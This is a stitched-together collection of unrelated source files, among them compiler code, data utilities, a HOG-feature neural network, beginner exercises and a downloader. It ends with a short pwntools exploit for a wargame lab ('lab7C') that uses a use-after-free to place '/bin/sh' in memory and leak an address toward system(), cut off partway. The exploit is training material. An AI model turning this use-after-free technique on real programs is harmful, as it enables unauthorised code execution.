self.symbolTable.insert(temp, [0, 'ID', '~', "global", "-"])
elif operation == 'FOR':
if (int(arg2) - int(arg1) > 10 ):
self.generateCode(operation, arg1, arg2, result)
else:
self.loop_values.append(int(arg1))
self.loop_values.append(int(arg2))
self.loop_unroll = True
elif operation == 'loop-end' and self.loop_unroll:
op =[]
temp = []
for i in range(self.loop_statement_count -1):
op.append(self.allCode.pop())
for i in range(self.loop_values[0], self.loop_values[1]):
for j in op[::-1]:
if(j.operation not in ['=','-','+', '*','/']):
self.allCode.append(j)
else:
if j not in temp:
temp.append(j)
self.allCode += (temp)
self.loop_values = []
self.loop_status = ''
self.loop_unroll = False
def putLabel(self, kind):
label = len(self.allCode)
if kind == 'result':
for i in reversed(self.allCode):
if i.result.endswith("S"):
i.result += str(label)
break
elif kind == 'arg1':
for i in reversed(self.allCode):
if i.arg1.endswith("S"):
i.arg1 += str(label)
break
else:
allCodeReverse = self.allCode[::-1]
for i in range(len(allCodeReverse)):
if allCodeReverse[i].result.endswith("S"):
self.generate_icg("goto", "S"+str(label-i-1), '', '')
break
def getLatestTemp(self):
return 't'+str(self.tempVarCount)
class Quadruple:
def __init__(self, operation, arg1, arg2, result):
self.operation = operation
self.arg1 = arg1
self.arg2 = arg2
self.result = result
def print_quadruple(self):
print(self.operation, self.arg1, self.arg2, self.result)
| true |
5562e79062f81e96d531adc685df17684b4d3428 | Python | athro/openSNPAnalysis | /python_scripts/compress.py | UTF-8 | 1,905 | 2.640625 | 3 | [
"MIT"
] | permissive | import gzip
import zipfile
import os
#AK:TBD:# xls unfinished and untested
#AK:TBD:import xlrd
magic = {}
magic["zip"] = b'\x50\x4b\x03\x04'
magic["gzip"] = b'\x1f\x8b\x08'
#magic["bzip"] = b'\x42\x5a\x68'
#AK:TBD:magic["xls"] = b'\xd0\xcf'
#AK:TBD:# change to filehanle for zipped xls?
#AK:TBD:def test_xsl(filename):
#AK:TBD: with open(filename, 'rb') as f:
#AK:TBD: buffer = f.read(1024)
#AK:TBD: return_val = False
#AK:TBD: if buffer.startswith(magic["xls"]):
#AK:TBD: return_val = True
#AK:TBD: return return_val
#AK:TBD:# Idea: open xls, convert it to temp. csv, return filehandle for csv
#AK:TBD:def open_xls(filename):
#AK:TBD: wb = xlrd.open_workbook(filename_temp)
#AK:TBD: ws = wb.sheets()[0]
#AK:TBD: temp_csv_file_name = get_temp_csv_file_name
#AK:TBD: temp_csv_file = open(temp_csv_file_name, 'wb')
#AK:TBD: wr = csv.writer(temp_csv_file, quoting=csv.QUOTE_ALL)
#AK:TBD: for rownum in xrange(ws.nrows):
#AK:TBD: wr.writerow(ws.row_values(rownum))
#AK:TBD: temp_csv_file.close()
def open_zip(filename):
zf = zipfile.ZipFile(filename)
filenames = zf.namelist()
fh = zf.open(filenames[0])
return fh
def open_gzip(filename):
fh = gzip.GzipFile(filename)
return fh
def compress_open(filename):
with open(filename, 'rb') as f:
start_of_file = f.read(1024)
for (kind, bytes) in magic.items():
if start_of_file.startswith(bytes):
return get_fh[kind](filename)
return open(filename)
get_fh = {}
get_fh["zip"] = open_zip
get_fh["gzip"] = open_gzip
#AK:TBD:get_fh["xls"] = open_xls
get_fh["plain"] = open
if __name__ == "__main__":
directory = '../../data/genotypes/'
files = os.listdir(directory)
for filename in files:
try:
cf = compress_open(directory+"/"+filename)
except:
print("Can't uncompress "+filename)
| true |
8ed3d20034fa3b76446d18df2fb4d1537805116d | Python | NeuralVFX/wasserstein-gan | /util/helpers.py | UTF-8 | 2,278 | 2.703125 | 3 | [] | no_license | import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
import torch
import torch.nn as nn
from torch.utils.data import *
############################################################################
# Helper Utilities
############################################################################
def mft(tensor):
# Return mean float tensor
return torch.mean(torch.FloatTensor(tensor))
def weights_init_normal(m):
# Set initial state of weights
classname = m.__class__.__name__
if 'ConvTrans' == classname:
pass
elif 'Conv2d' in classname or 'Linear' in classname or 'ConvTrans' in classname:
nn.init.normal(m.weight.data, 0, .02)
def new_random_z(bs, z, seed=False):
# Creates Z vector of normally distributed noise
if seed:
torch.manual_seed(seed)
z = torch.FloatTensor(bs, z, 1, 1).normal_(0, 1).cuda()
return z
class BatchFeeder:
# Abstracting the fetching of batches from the data loader
def refresh(self):
self.data_iter = iter(self.train_loader)
self.batch_len = len(self.train_loader)
self.data_iter_count = 0
def __init__(self, dataloader):
self.train_loader = dataloader
self.original_len = len(self.train_loader)
self.refresh()
def get_new(self):
if self.data_iter_count < self.batch_len:
self.refresh()
batch = self.data_iter
self.data_iter_count += 1
return batch
############################################################################
# Display Images
############################################################################
def show_test(gen, z, denorm, save=False):
# Generate samples from z vector, show and also save
gen.eval()
results = gen(z)
gen.train()
fig, axes = plt.subplots(4, 4, figsize=(10, 10))
for i, ax in enumerate(axes.flat):
ax.imshow(denorm.denorm(results[i]))
if save:
plt.savefig(save)
plt.show()
plt.close(fig)
def show_samples(results, denorm):
# Show samples, used to show raw samples from dataset
fig, axes = plt.subplots(4, 4, figsize=(10, 10))
for i, ax in enumerate(axes.flat):
ax.imshow(denorm.denorm(results[i]))
plt.show()
plt.close(fig)
| true |
7fa8b9fd51cdcc523cc10f8ada9db4ea42d8fd9e | Python | danielpeterson0530/Code | /Python/Functions/gzipfile2dict.py | UTF-8 | 411 | 3.109375 | 3 | [] | no_license | # Python Function to gunzip file and return dictionary (requires gzip package)
def gzipfile2dict(filename):
# requires gzip package
gzip_dict = {}
with gzip.open(filename, mode='rt') as f:
for line in f:
elements = line.strip().split('\t')
label = elements[0]
id = elements[4]
gzip_dict[label] = str(gzip_dict.get(label, "")) + str(id) + "\t"
return gzip_dict
| true |
4ce7709e03ecea50f48d79e17c98449668a904c2 | Python | As4klat/Tutorial_Python | /Tanda 1/07.py | UTF-8 | 579 | 4.03125 | 4 | [] | no_license | compr = True
while compr:
try:
m = int(input("Introduzca número factoriales a calcular: "))
compr = False
except ValueError:
print("Introduzca solo valores numéricos enteros\n")
for i in range(1, m+1):
compr = True
while compr:
try:
n = int(input("Introduzca un número para calcular su factorial: "))
compr = False
except ValueError:
print("Introduzca solo valores numéricos enteros\n")
factorial = 1
for j in range(2, n+1):
factorial *= j
print(i, n, factorial) | true |
51975ed36b591ef25e3d7235d79d68bd3e5fbca3 | Python | cloverrose/pythonz | /pythonz/downloader.py | UTF-8 | 1,840 | 2.890625 | 3 | [
"MIT"
] | permissive |
import urllib
import urllib2
import sys
from pythonz.exceptions import DownloadError
class ProgressBar(object):
def __init__(self, out=sys.stdout):
self._term_width = 79
self._out = out
def update_line(self, current):
num_bar = int(current / 100.0 * (self._term_width - 5))
bars = u'#' * num_bar
spaces = u' ' * (self._term_width - 5 - num_bar)
percentage = u'%3d' % int(current) + u'%\r'
return bars + spaces + u' ' + percentage
def reporthook(self, blocknum, bs, size):
current = (blocknum * bs * 100) / size
if current > 100:
current = 100
self._out.write(self.update_line(current))
self._out.flush()
def finish(self):
self._out.write(self.update_line(100))
self._out.flush()
class HEADRequest(urllib2.Request):
def get_method(self):
return "HEAD"
class Downloader(object):
@classmethod
def read(cls, url):
try:
r = urllib.urlopen(url)
except IOError:
raise DownloadError('Failed to fetch %s' % url)
else:
return r.read()
@classmethod
def read_head_info(cls, url):
try:
req = HEADRequest(url)
res = urllib2.urlopen(req)
except IOError:
raise DownloadError('Failed to fetch %s' % url)
else:
if res.code != 200:
raise DownloadError('Failed to fetch %s' % url)
return res.info()
@classmethod
def fetch(cls, url, filename):
b = ProgressBar()
try:
urllib.urlretrieve(url, filename, b.reporthook)
sys.stdout.write('\n')
except IOError:
sys.stdout.write('\n')
raise DownloadError('Failed to fetch %s from %s' % (filename, url))
| true |
1dedbe1ea9d944f68f71d2a8a6e06d6774028025 | Python | Aasthaengg/IBMdataset | /Python_codes/p03162/s104439235.py | UTF-8 | 427 | 2.796875 | 3 | [] | no_license | n = int(input())
A, B, C = [], [], []
for i in range(n):
a, b, c = map(int, input().split())
A.append(a)
B.append(b)
C.append(c)
dp_a, dp_b, dp_c = [0] * n, [0] * n, [0] * n
dp_a[0] = A[0]
dp_b[0] = B[0]
dp_c[0] = C[0]
for i in range(1, n):
dp_a[i] = max(dp_b[i-1], dp_c[i-1]) + A[i]
dp_b[i] = max(dp_c[i-1], dp_a[i-1]) + B[i]
dp_c[i] = max(dp_a[i-1], dp_b[i-1]) + C[i]
print(max(dp_a[-1], dp_b[-1], dp_c[-1])) | true |
eebc418d2ed8d3ed1cb30ff00008e19e421efccf | Python | Ponkiruthika112/codekataset1 | /print_bef_0.py | UTF-8 | 301 | 2.71875 | 3 | [] | no_license | n=int(input())
l=list(map(int,input().split()))
s=""
for i in range(0,len(l)):
s=s+str(l[i])
k=""
i=0
p=-1
while i<len(s):
if s[i]=="0" and s[i-1]=="0":
i=i+1
elif s[i]=="0":
k=k+s[p+1:i]+" "
p=i
i=i+1
else:
i=i+1
print(k.strip())
#fjk
| true |
9557732bd2074692bb5987acc3cd6e76f0d0a913 | Python | naturofix/clear_data | /check_4_duplites.py | UTF-8 | 6,936 | 2.671875 | 3 | [] | no_license | # the purpose of this script is to check to file location and make sure files exist in both.
# if not file should be copied to to a temp folder in the second location
import os
import sys
import fnmatch
import time
import datetime
import filecmp
path_1 = sys.argv[1]
path_2 = sys.argv[2]
path_3 = '/mnt/BLACKBURNLAB/'
raw = True
other = True
def new_dir(test_path):
if not os.path.isdir(test_path):
cmd = 'mkdir %s' %(test_path)
print cmd
os.system(cmd)
# test = False
# try :
# test = sys.argv[3]
# except:
# print('python check_4_duplicates.py <path_1> <path_2> test : test will prevent deleting files')
# raw_input('enter to run script, all raw file not duplicated on both paths, will be copied to path_2')
# test = False
if raw == True:
raw_input('\n\nenter to run script, all raw file not duplicated on both paths, will be copied to %s/missing_files \n\n' %(path_2))
missing_file_list = []
cmd = 'mkdir missing_files'
os.system(cmd)
write_file = open('missing_files/%s_duplications.txt' %(path_1.replace('/','_')),'a')
file_list = ['*.raw']
print file_list
raw_1 = []
file_name_list_1 = []
print('running search %s' %(path_1))
for file_name in file_list:
print file_name
for root, dirnames, filenames in os.walk(path_1):
for filename in fnmatch.filter(filenames, file_name):
raw_1.append(os.path.join(root, filename))
file_name_list_1.append(filename)
#print filename
print('search 1 done')
print(len(raw_1))
print(len(set(file_name_list_1)))
write_file.write('%s : %s\n\n' %(path_1,len(raw_1)))
raw_2 = []
file_name_list_2 = []
print('running search %s' %path_3)
for file_name in file_list:
print file_name
for root, dirnames, filenames in os.walk(path_3):
for filename in fnmatch.filter(filenames, file_name):
raw_2.append(os.path.join(root, filename))
file_name_list_2.append(filename)
#print filename
print('search 2 done')
print(len(raw_2))
print(len(set(file_name_list_2)))
for entry in list(set(file_name_list_1)):
print '\n\n'
print entry
#index_1 = file_name_list_1.index(entry)
index_1 = [i for i, x in enumerate(file_name_list_1) if x == entry]
print index_1
#index_2 = file_name_list_2.index(entry)
index_2 = [i for i, x in enumerate(file_name_list_2) if x == entry]
print index_2
for i in index_1:
file_1 = raw_1[i]
hit = 0
dup_list = []
print file_1
for j in index_2:
file_2 = raw_2[j]
print file_2
print filecmp.cmp(file_1,file_2)
if filecmp.cmp(file_1,file_2) == True:
hit += 1
dup_list.append(file_2)
if hit == 0:
missing_file_list.append(file_1+'\n')
new_path = '%s/missing_files/' %(path_2)
new_dir(new_path)
file_list = file_1.split('/')
#print file_list
path_list = file_list[4:len(file_list)-1]
for path_entry in path_list:
new_path = '%s/%s' %(new_path,path_entry)
new_dir(new_path)
output_path = new_path
cmd = 'cp %s %s/%s' %(file_1,output_path,entry)
print cmd
os.system(cmd)
if hit > 1:
write_file.write('\n%s : %s copies in %s\n' %(file_1,hit,path_2))
for dup in dup_list:
write_file.write('\t\t%s\n' %(dup))
write_file.flush()
#raw_input()
write_file.close()
print missing_file_list
write_file = open('missing_files/%s_missing.txt' %(path_1.replace('/','_')),'a')
write_file.writelines(missing_file_list)
write_file.close()
if other == True:
print '\n\nsearching for QE configuration files\n\n'
file_extension_list = ['xlsx', 'pptx', 'docx', 'db', 'sld', 'pdf','meth','csv',]
file_list_ext = []
for file_name in file_extension_list:
print file_name
for root, dirnames, filenames in os.walk(path_1):
for filename in fnmatch.filter(filenames, '*.%s' %file_name):
file_list_ext.append(os.path.join(root, filename))
#print filename
for file_path in file_list_ext:
#missing_file_list.append(file_1+'\n')
#print 'missing file %s' %file_1
new_path = '%s/QE_files/' %(path_2)
new_dir(new_path)
file_list = file_path.split('/')
path_list = file_list[4:len(file_list)-1]
for path_entry in path_list:
new_path = '%s/%s' %(new_path,path_entry)
new_dir(new_path)
output_path = new_path
cmd = 'cp %s %s/%s' %(file_path,output_path,file_list[-1])
print cmd
os.system(cmd)
# for i in range(0,len(file_name_list)):
# file_name = file_name_list[i]
# file_path = refs[i]
# #print file_path
# #print file_name
# number = file_name_list.count(file_name)
# #li = file_name_list.index(file_name)
# #print li
# #print refs[li]
# #print number
# if number > 1:
# print file_name
# print number
# indices = [i for i, x in enumerate(file_name_list) if x == file_name]
# dups = [refs[j] for j in indices]
# times = []
# for dup_file_path in dups:
# if os.path.exists(dup_file_path):
# times.append(os.path.getmtime(dup_file_path))
# #print dups
# #print times
# min_index = times.index(min(times))
# #print min_index
# #print times[min_index]
# first_file = dups[min_index]
# if os.path.exists(first_file) and os.path.exists(file_path):
# if 'History' not in file_path:
# if file_path != first_file:
# print "\n"
# print first_file
# print file_path
# if filecmp.cmp(first_file,file_path):
# print 'same file'
# cmd = 'mv %s %s' %(file_path,rep_path)
# print cmd
# reps_count += 1
# if test == False:
# os.system(cmd)
# print 'moved'
# mv_file_list.append(file_path)
# else:
# print 'not the same'
# diffs += 1
# else:
# print 'first file'
# else:
# print 'in history'
# hist += 1
# else:
# missing_file_list = []
# if not os.path.exists(file_path):
# missing_file_list.append(file_path)
# if not os.path.exists(first_file):
# missing_file_list.append(first_file)
# for missing_file in missing_file_list:
# print '\n\n\n##################### Error ###################\n\n\n'
# if file_path in mv_file_list:
# print 'file already moved, which is rather strange'
# else:
# print 'file not in moved list'
# print '%s no longer exists' %file_path
# print '\n\n\n##################### Error ###################\n\n\n'
# raw_input('enter to continue')
# print 'total : %s' %total
# print i
# print 'reps : %s (%s%s)' %(reps_count,round(float(reps_count)/float(i),3)*100,'%')
# print 'same name different file = %s' %(diffs)
# print 'in history : %s' %(hist)
# print 'total : %s' %total
# print 'reps : %s (%s%s)' %(reps_count,round(float(reps_count)/float(i),3)*100,'%')
# print 'same name different file = %s' %(diffs)
# print 'in history : %s' %(hist)
# for file_path in refs
# if os.path.exists(file_path):
# cmd = 'mv %s %s' %(file_path.replace(' ','\ '),wash_month)
# print cmd
# if test == False:
# os.system(cmd)
# print 'executed'
# #raw_input()
| true |
56990b805ddabefdb25f6f304a6e1f319011e8c7 | Python | jonahobw/honors | /image_features_network.py | UTF-8 | 15,208 | 2.609375 | 3 | [] | no_license | import copy
import torch.nn.functional as F
import torch
import os
import pandas as pd
from sklearn.model_selection import train_test_split
from torch import nn
import torch.optim as optim
from torch.utils.data import Dataset
from sklearn.preprocessing import StandardScaler
import time
import matplotlib.pyplot as plt
from general import str_date
from image_features import gather_image_features, load_hog_df
import numpy as np
# input size is the length of the feature vector, see gather_image_features in image_features.py
from tree_helper import split_all
INPUT_SIZE = 22
HIDDEN_LAYER_SIZE = 200
NUM_CLASSES = 43
EPOCHS = 5
LEARNING_RATE = 0.01
class hog_dataset(Dataset):
# adapted from https://medium.com/@shashikachamod4u/excel-csv-to-pytorch-dataset-def496b6bcc1
def __init__(self, filename):
global NUM_CLASSES
# read csv and load data
# specific to hog -----------------------------------
df = pd.read_csv(filename)
x = df.iloc[0:len(df.index), 2:82].values
y = df.iloc[0:len(df.index), 1].values
# x = df.iloc[0:256, 2:82].values
# y = df.iloc[0:256, 1].values
# array where each index represents a class, and the value at that index represents the attribute label for that
# class
class_attributes = split_all("shape")
y = [class_attributes[i] for i in y]
mapping = {"circle": 0, "triangle": 1, "diamond": 2, "inverted_triangle" : 3, "octagon" : 4}
y = [mapping[i] for i in y]
num_unique_classes = len(list(set(y)))
NUM_CLASSES = num_unique_classes
# Feature Scaling
sc = StandardScaler()
x_train = sc.fit_transform(x)
y_train = y
# converting to torch tensors
self.X_train = torch.tensor(x_train, dtype=torch.float32)
self.y_train = torch.tensor(y_train)
def __len__(self):
return int(len(self.y_train))
def __getitem__(self, item):
return self.X_train[item], self.y_train[item]
class Net(nn.Module):
# adapted from https://curiousily.com/posts/build-your-first-neural-network-with-pytorch/
def __init__(self):
super(Net, self).__init__()
self.fc1 = nn.Linear(INPUT_SIZE, HIDDEN_LAYER_SIZE)
nn.init.uniform_(self.fc1.weight, -1.0, 1.0)
self.fc2 = nn.Linear(HIDDEN_LAYER_SIZE, HIDDEN_LAYER_SIZE)
nn.init.uniform_(self.fc1.weight, -1.0, 1.0)
self.fc3 = nn.Linear(HIDDEN_LAYER_SIZE, HIDDEN_LAYER_SIZE)
nn.init.uniform_(self.fc1.weight, -1.0, 1.0)
self.fc4 = nn.Linear(HIDDEN_LAYER_SIZE, NUM_CLASSES)
nn.init.uniform_(self.fc1.weight, -1.0, 1.0)
def forward(self, x):
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = F.relu(self.fc3(x))
#return torch.sigmoid(self.fc4(x))
#return self.fc4(x)
return F.relu(self.fc4(x))
def train(csv_file, epochs = EPOCHS, lr = LEARNING_RATE):
#adapted from https://curiousily.com/posts/build-your-first-neural-network-with-pytorch/
df = pd.read_csv(csv_file)
X = df[['max_color_len', 'max_color_r', 'max_color_g', 'max_color_b', 'r_avg', 'g_avg', 'b_avg',
'dom_color1_r', 'dom_color1_g', 'dom_color1_b', 'dom_color2_r', 'dom_color2_g', 'dom_color2_b',
'dom_color3_r', 'dom_color3_g', 'dom_color3_b', 'dom_color4_r', 'dom_color4_g', 'dom_color4_b',
'dom_color5_r', 'dom_color5_g', 'dom_color5_b']]
y = df[['img_class']]
# split data into 20% validation and 80% training
X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=0.2)
# 2d tensor
X_train = torch.from_numpy(X_train.to_numpy()).float()
# 1d tensor
y_train = torch.squeeze(torch.from_numpy(y_train.to_numpy()))
# 2d tensor
X_val = torch.from_numpy(X_val.to_numpy()).float()
# 1d tensor
y_val = torch.squeeze(torch.from_numpy(y_val.to_numpy()))
since = time.time()
val_loss_history = []
val_acc_history = []
training_loss_history = []
training_acc_history = []
model = Net()
criterion = nn.CrossEntropyLoss()
#optimizer = optim.SGD(model.parameters(), lr)#, momentum=0.9)
optimizer = optim.Adam(model.parameters(), lr=lr)
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
X_train = X_train.to(device)
y_train = y_train.to(device)
X_val = X_val.to(device)
y_val = y_val.to(device)
model = model.to(device)
criterion = criterion.to(device)
for epoch in range(epochs):
# divide learning rate in half every 25 epochs
if(epochs % 100 == 0 and epoch != 0):
lr = lr/2
#----------training data----------
model.train()
optimizer.zero_grad()
with torch.set_grad_enabled(True):
# run training data through the model and get predictions
y_pred = model(X_train)
y_pred = torch.squeeze(y_pred)
# calculate training loss and add it to the history, do the same with training accuracy
train_loss = criterion(y_pred, y_train)
training_loss_history.append(train_loss)
train_acc = calculate_accuracy(y_train, y_pred)
training_acc_history.append(train_acc)
# update model based on training data
train_loss.backward()
optimizer.step()
#----------validation data----------
model.eval()
optimizer.zero_grad()
with torch.set_grad_enabled(False):
# run validation data through the model and get predictions
y_val_pred = model(X_val)
y_val_pred = torch.squeeze(y_val_pred)
# calculate validation loss and add it to the history, do the same with validation accuracy
val_loss = criterion(y_val_pred, y_val)
val_loss_history.append(val_loss)
val_acc = calculate_accuracy(y_val, y_val_pred)
val_acc_history.append(val_acc)
print("epoch {}\nTrain set - loss: {:.4f}, accuracy: {:.4f}%\nVal set - loss: {:.4f}, accuracy: {:.4f}%\n"
.format(str(epoch), train_loss.item(), train_acc.item()*100, val_loss.item(), val_acc.item()*100))
time_elapsed = time.time() - since
print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))
return model, training_acc_history, val_acc_history, training_loss_history, val_loss_history
def calculate_accuracy(y_true, y_pred):
# y_true: 1d tensor of sample predictions
# y_pred: 2d tensor where the 1st dimension is the sample and the second dimension is the prediction
# vector for that sample
a = torch.max(y_pred, dim=1)[1]
print(a[:10])
b = y_true
print(b[:10])
c = a==b
print(c[:10])
return c.sum().float()/len(y_true)
def save_model(model, fname = None):
#save a model
if fname == None:
path = os.path.join(os.getcwd(), "Image_features", fname)
torch.save(model, fname)
print('Model saved as {}'.format(fname))
return fname
def load_model(filename = None):
# load a model from a file
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
model = torch.load(filename)
model.to(device)
model.eval()
return model
def create_train_save_print_model(csv):
model, training_acc, test_acc, training_loss, test_loss = train(csv)
model.eval()
image = os.path.join(os.getcwd(), 'Test', '00', '00243.png')
features = gather_image_features(image)
features = torch.from_numpy(np.array(features)).float()
output = model(features)
print(output)
#save_model(model)
#plot_accuracy_and_loss(training_acc, training_loss, test_acc, test_loss)
def plot_accuracy_and_loss(train_acc, train_loss, test_acc, test_loss):
# plots the training and validation accuracy and loss during training
# plotting graphs for accuracy
plt.figure(0)
plt.plot(train_acc, label='training accuracy')
plt.plot(test_acc, label='val accuracy')
plt.title('Accuracy')
plt.xlabel('epochs')
plt.ylabel('accuracy')
plt.legend()
plt.show()
path = os.path.join(os.getcwd(), "ML", "Outputs", "accuracy.png")
plt.savefig(path)
plt.figure(1)
plt.plot(train_loss, label='training loss')
plt.plot(test_loss, label='val loss')
plt.title('Loss')
plt.xlabel('epochs')
plt.ylabel('loss')
plt.legend()
plt.show()
path = os.path.join(os.getcwd(), "ML", "Outputs", "loss.png")
plt.savefig(path)
def train_hog_model(model, dataloader, lr = LEARNING_RATE, epochs = EPOCHS):
criterion = nn.CrossEntropyLoss()
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
if torch.cuda.is_available():
model.cuda()
model.train()
optimizer = optim.SGD(model.parameters(), lr, momentum=0.9)
since = time.time()
num_samples = len(dataloader.dataset)
#print("Number of samples in the dataset:\t{}".format(num_samples))
training_loss_history = []
training_acc_history = []
best_model_wts = copy.deepcopy(model.state_dict())
best_acc = 0.0
for i in range(epochs):
print('Epoch {}/{}'.format(i + 1, epochs))
print('-' * 10)
running_loss = 0
running_corrects = 0
count = 0
for features, labels in dataloader:
count += 1
if (count % 100 == 0):
print("Completed batch " + str(count))
# forward pass
output = model(features)
loss = criterion(output, labels)
_, preds = torch.max(output, 1)
optimizer.zero_grad()
loss.backward()
optimizer.step()
running_loss +=loss.item()
running_corrects += int(torch.sum(preds == labels.data))
epoch_loss = running_loss / num_samples
epoch_acc = running_corrects / num_samples
print('\tLoss: {:.4f} Acc: {:.4f}'.format(epoch_loss, epoch_acc))
training_acc_history.append(epoch_acc)
training_loss_history.append(epoch_loss)
if epoch_acc > best_acc:
best_acc = epoch_acc
best_model_wts = copy.deepcopy(model.state_dict())
time_elapsed = time.time() - since
print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))
print('Best Acc: {:4f}'.format(best_acc))
# load best model weights
model.load_state_dict(best_model_wts)
return model, training_acc_history, training_loss_history
def hog_predict_shape(model, dataset, original_csv, save_filename = None):
# takes a csv file from <root_folder> (one that has the cluster predictions) and takes
# information collected from a shapes_in_clusters csv to predict the shape of an image. Creates a new
# csv called shape_predictions where the columns are
# img path, img class, img shape, shape prediction (string)
# dataset is a hog_dataset instance
model.eval()
if save_filename is None:
save_filename = "nn_shape_predictions.csv"
original_csv_df = load_hog_df(original_csv)
root_folder = os.path.split(original_csv)[0]
save_path = os.path.join(root_folder, save_filename)
f = open(save_path, 'w+')
f.write("img,class,model_predicted_shape,true_shape,correct")
# array where each index represents a class, and the value at that index represents the attribute label for that
# class
class_attributes = split_all("shape")
mapping = {"circle": 0, "triangle": 1, "diamond": 2, "inverted_triangle": 3, "octagon": 4}
inv_mapping = {v: k for k, v in mapping.items()}
total_correct = 0
shapes_correct = {"circle": 0, "triangle": 0, "diamond": 0, "inverted_triangle": 0, "octagon": 0}
shapes_count = {"circle": 0, "triangle": 0, "diamond": 0, "inverted_triangle": 0, "octagon": 0}
num_rows = len(dataset)
for i in range(num_rows):
correct = 0
# get a row of hog data
data, label = dataset.__getitem__(i)
label = int(label.item())
# get model prediction
pred = list(model(data))
pred_shape = pred.index(max(pred))
# get img file name and img class
data = original_csv_df.iloc[[i], [0,1]]
data = list(data.iloc[0])
img_name = data[0]
true_class = data[1]
true_shape = class_attributes[true_class]
if mapping[true_shape] != label:
print("Error, true class is not equal to the label")
exit(-1)
shapes_count[true_shape] +=1
if pred_shape == mapping[true_shape]: # correct prediction?
total_correct +=1
shapes_correct[true_shape] += 1
correct = 1
f.write("\n{},{},{},{},{}".format(img_name, true_class, inv_mapping[pred_shape], true_shape, correct))
f.close()
print("total correct:\t\t{}/{}, {:4f}%".format(total_correct, num_rows, 100 * total_correct/num_rows))
for key in shapes_count:
print("{}:\t\t{}/{} correct, {:4f}%".format(key, shapes_correct[key],shapes_count[key],
100 * shapes_correct[key]/shapes_count[key]))
def create_train_save_hog_model(filename = None, evaluate = True, save = True):
global INPUT_SIZE
INPUT_SIZE = 80
if filename is None:
filename = os.path.join(os.getcwd(), "Image_features", "HOG", "80hog_img_features_GTSRB_ResNet_2021-03-11",
"80hog_img_features_GTSRB_ResNet_2021-03-11.csv")
hog_data = hog_dataset(filename)
print("Number of samples in the dataset:\t{}".format(len(hog_data)))
train_loader = torch.utils.data.DataLoader(hog_data, batch_size=64, shuffle=True)
model = Net()
model, train_acc, train_loss = train_hog_model(model, train_loader)
if evaluate:
hog_predict_shape(model, hog_data, original_csv=filename)
if save:
fname = os.path.join(os.path.split(filename)[0], str_date() + "hog_model")
save_model(model, fname)
def load_evaluate_hog(filename = None, test_data = False):
if filename is None:
filename = os.path.join(os.getcwd(), "Image_features", "HOG",
"80hog_img_features_GTSRB_ResNet_2021-03-11", "2021-04-01hog_model")
model = load_model(filename)
csv = os.path.join(os.getcwd(), "Image_features", "HOG", "80hog_img_features_GTSRB_ResNet_2021-03-11",
"80hog_img_features_GTSRB_ResNet_2021-03-11.csv")
if test_data:
csv = os.path.join(os.getcwd(), "Image_features", "HOG", "80hog_img_features_Test_2021-03-22",
"80hog_img_features_Test_2021-03-22.csv")
hog_data = hog_dataset(csv)
hog_predict_shape(model, hog_data, original_csv=csv)
if __name__ == '__main__':
#csv = os.path.join(os.getcwd(), "Image_features", "img_features_GTSRB_ResNet_2020-12-29_normalized.csv")
#csv = os.path.join(os.getcwd(), "Image_features", "img_features_small_test_dataset_2020-12-29.csv")
#train(csv)
#create_train_save_print_model(csv)
load_evaluate_hog(test_data=True)
#create_train_save_hog_model(evaluate=False, save=False) | true |
52e37cecef8f581ae567ea6011fe1b99bc2fa120 | Python | Swapna-Sahu/python-and-data-science-tools | /week1/HomeworkWeek1.py | UTF-8 | 2,316 | 4.65625 | 5 | [] | no_license | # Task 1 - Write a python script to print your name and age
name = input("Enter your name")
age = int(input("Enter your age"))
print(f"Your name is : {name}. Your age is : {age}")
# Task 2 - Create a list of your 5 favorite movies and store it in the variable
movies = []
for i in range(5):
movie = input(" Enter your favorite movies")
movies.append(movie)
print("Your 5 Fav movies are : ", movies)
# Task 3 - Write a Python program to display the first and last colors from the following list.
color_list = ["Red", "Green", "White", "Black"]
print(color_list[0], color_list[-1])
# Task 4 - Write a Python script to add a key to a dictionary
numbers = {0: 10, 1: 20}
numbers[2] = 30
print(numbers)
# Task 5 - Write a Python program to calculate body mass index.
name = input("enter your name")
weight = float(input("enter your weight in kg"))
height = float(input("enter your height in meter"))
bmi = weight/height**2
print(name, "'s BMI is ", bmi)
# Task 6 - Guess a number game - between 1 to 9.
guess_number = 7
while True:
user_guess = int(input("Enter your guess number"))
if user_guess == guess_number:
print("Well guessed!")
break
# Task 7 - Create a tuple with different data types
sample_tuple = ("hello world", 134, True, 40.4)
print(sample_tuple)
# Task 8 - Create a list of 5 city names and convert it into tuples.
city = ["Delhi", "Mumbai", "Kolkata", "Chennai", "Copenhagen"]
print("Type of city variable : ", type(city))
city_tuple = tuple(city)
print("Type of city_tuple variable : ", type(city_tuple))
print("City Tuple : ", city_tuple)
# Task 9 - Remove duplicated from the list
sample_list = [10, 20, 30, 20, 10, 50, 60, 40, 80, 50, 40]
sample_list = list(dict.fromkeys(sample_list))
print(sample_list)
example_list = [10, 20, 30, 20, 10, 50, 60, 40, 80, 50, 40]
example_list = list(set(example_list))
print(example_list)
# Task 10 - Accept a string from user and remove the characters which have odd index values of a given string and print them.
str1 = input("Please Enter your Own String : ")
str2 = ''
# for i in range(len(str1)):
# if (i % 2 == 0):
# str2 += str1[i]
for i, sample_char in enumerate(str1):
if i % 2 == 0:
str2 += sample_char
print("Original String : ", str1)
print("Final String : ", str2)
| true |
b464ea2e3b50573dc561417a5852b727056a0046 | Python | zytMatrix/MBEsolutions | /lab7C.py | UTF-8 | 882 | 2.515625 | 3 | [] | no_license | from pwn import *
SYSTEM_OFFSET = 0x19da37 # Offset from `system` to `small_str`
# Choices
MAKE_STR = "1"
MAKE_NUM = "2"
DEL_STR = "3"
DEL_NUM = "4"
PRINT_STR = "5"
PRINT_NUM = "6"
p = process(["/levels/lab07/lab7C"])
log.info(util.proc.pidof(p))
#pause()
# Fill the first num index with the first allocation pointer
p.sendline(MAKE_NUM)
p.sendline("1234")
# -- Delete it to free up the alloc
p.sendline(DEL_NUM)
# -- Realloc as a string
p.sendline(MAKE_STR)
p.sendline("/bin/sh")
# Read address of `short_str`
p.sendline(PRINT_NUM)
p.recv()
p.sendline("1")
